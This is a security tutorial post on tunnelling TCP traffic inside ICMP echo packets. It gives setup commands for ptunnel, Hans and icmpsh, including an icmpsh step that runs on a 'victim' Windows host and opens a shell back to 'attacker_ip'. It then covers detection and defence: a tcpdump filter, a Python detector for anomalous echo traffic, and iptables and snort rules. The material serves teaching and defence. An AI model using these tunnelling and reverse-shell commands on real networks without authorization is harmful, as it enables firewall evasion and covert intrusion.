# How to Tunnel TCP Packets Over ICMP Echo Reply and Request Packets

ICMP tunneling is a technique used to encapsulate TCP packets within ICMP echo request and reply packets, allowing data transmission through networks that might block traditional TCP traffic but permit ICMP traffic. This method is often used in penetration testing and network security assessments.

## **How It Works**

ICMP tunneling works by embedding data payloads within ICMP packets (typically Type 8 – Echo Request and Type 0 – Echo Reply). Since many firewalls allow ICMP traffic for network diagnostics, this method can bypass restrictions.

## **Tools for ICMP Tunneling**

1. ptunnel (ICMP tunneling tool)

2. icmpsh (Simple ICMP tunneling)

3. Hans (IP over ICMP)

## **You Should Know: Practical Implementation**

### **1. Setting Up ptunnel for ICMP Tunneling**

**Step 1: Install ptunnel (Linux)**

sudo apt-get install ptunnel

**Step 2: Run ptunnel on the Server (Listener)**

sudo ptunnel -x your_password

**Step 3: Connect from the Client**

sudo ptunnel -p server_ip -lp 1080 -da target_ip -dp 22 -x your_password

This forwards local port `1080` to `target_ip:22` over ICMP.

### **2. Using icmpsh for Simple Tunneling**

**Step 1: Disable ICMP Echo Replies on Host**

sudo sysctl -w net.ipv4.icmp_echo_ignore_all=1

**Step 2: Start the icmpsh Server**

python icmpsh_m.py attacker_ip victim_ip

**Step 3: Execute on Victim Machine (Windows)**

icmpsh.exe -t attacker_ip -d 500 -s 128

### **3. Hans (IP over ICMP)**

**Step 1: Install Hans**

sudo apt-get install hans

**Step 2: Start the Server**

sudo hans -s 10.1.1.1 -p your_password

**Step 3: Connect from Client**

sudo hans -c server_ip -p your_password -a 10.1.1.2

### **Detecting ICMP Tunneling**

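To detect ICMP tunneling, monitor:

  • Unusually large ICMP packets
  • High ICMP traffic frequency

The following capture shows all ICMP traffic except echo requests, so echo replies are included. The filter is quoted so the shell does not interpret the brackets:

    sudo tcpdump -i eth0 'icmp and not icmp[icmptype]=icmp-echo'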
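
The two indicators listed above can be checked programmatically. The following Python code is an added example, not part of the original post: it parses raw IPv4 packets and flags sources whose echo traffic is oversized or too frequent. The thresholds, function names and sample packets are assumptions constructed for illustration.

```python
import struct
from collections import defaultdict

MAX_PAYLOAD = 64   # assumed threshold: default ping payloads are 56 (Linux) or 32 (Windows) bytes
MAX_RATE = 5.0     # assumed threshold: echo packets per second from one source

def parse_icmp(packet: bytes):
    """Return (src, icmp_type, payload_len) for an IPv4/ICMP packet, else None."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        return None
    ihl = (packet[0] & 0x0F) * 4
    if ihl < 20 or packet[9] != 1 or len(packet) < ihl + 8:   # protocol 1 = ICMP
        return None
    total_len = struct.unpack("!H", packet[2:4])[0]
    src = ".".join(str(b) for b in packet[12:16])
    return src, packet[ihl], max(0, min(total_len, len(packet)) - ihl - 8)

def find_suspects(capture):
    """capture: iterable of (timestamp_seconds, raw_ipv4_packet) -> {src: [reasons]}."""
    stats = defaultdict(lambda: {"times": [], "max_len": 0})
    for ts, pkt in capture:
        parsed = parse_icmp(pkt)
        if parsed is None or parsed[1] not in (0, 8):   # echo reply / echo request only
            continue
        src, _, plen = parsed
        stats[src]["times"].append(ts)
        stats[src]["max_len"] = max(stats[src]["max_len"], plen)
    suspects = {}
    for src, s in stats.items():
        reasons = []
        if s["max_len"] > MAX_PAYLOAD:
            reasons.append(f"echo payload of {s['max_len']} bytes")
        span = max(s["times"]) - min(s["times"])
        if len(s["times"]) / max(span, 1.0) > MAX_RATE:
            reasons.append(f"{len(s['times'])} echo packets in {span:.1f}s")
        if reasons:
            suspects[src] = reasons
    return suspects

def build(src, icmp_type, payload):
    """Constructed test packet: minimal IPv4 header (checksums zeroed) + ICMP echo header."""
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 28 + len(payload), 0, 0, 64, 1, 0,
                     bytes(map(int, src.split("."))), bytes([192, 0, 2, 1]))
    return ip + struct.pack("!BBHHH", icmp_type, 0, 0, 1, 1) + payload

# Constructed sample: one host pinging normally, one sending large, frequent echoes.
SAMPLE = [(float(i), build("198.51.100.10", 8, b"a" * 56)) for i in range(4)]
SAMPLE += [(i * 0.05, build("198.51.100.66", 8, b"\x00" * 900)) for i in range(40)]
```

Calling `find_suspects(SAMPLE)` reports only `198.51.100.66`, with both reasons attached; the thresholds should be tuned against a baseline of the network's normal ICMP traffic.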
    

## **What Undercode Say**

ICMP tunneling is a powerful technique for bypassing network restrictions, but it can also be abused by attackers. System administrators should monitor ICMP traffic for anomalies.

### **Defensive Measures**

  • Block unnecessary ICMP traffic:
    sudo iptables -A INPUT -p icmp --icmp-type echo-request -j DROP
    
  • Use IDS/IPS to detect tunneling:
    sudo snort -q -A console -c /etc/snort/snort.conf -i eth0
    
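  • Rate-limit ICMP requests (the ACCEPT rule only has an effect when it is placed before any blanket DROP for echo requests, and when a later rule or the chain policy drops the requests that exceed the limit):
    sudo iptables -A INPUT -p icmp --icmp-type echo-request -m limit --limit 1/s -j ACCEPT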
    

For ethical hacking, always ensure proper authorization before testing ICMP tunneling techniques.

## **Expected Output:**

A functional ICMP tunnel allowing TCP traffic to bypass firewall restrictions, with proper logging and detection mechanisms in place.

Reported By: Chuckkeith How – Hackers Feeds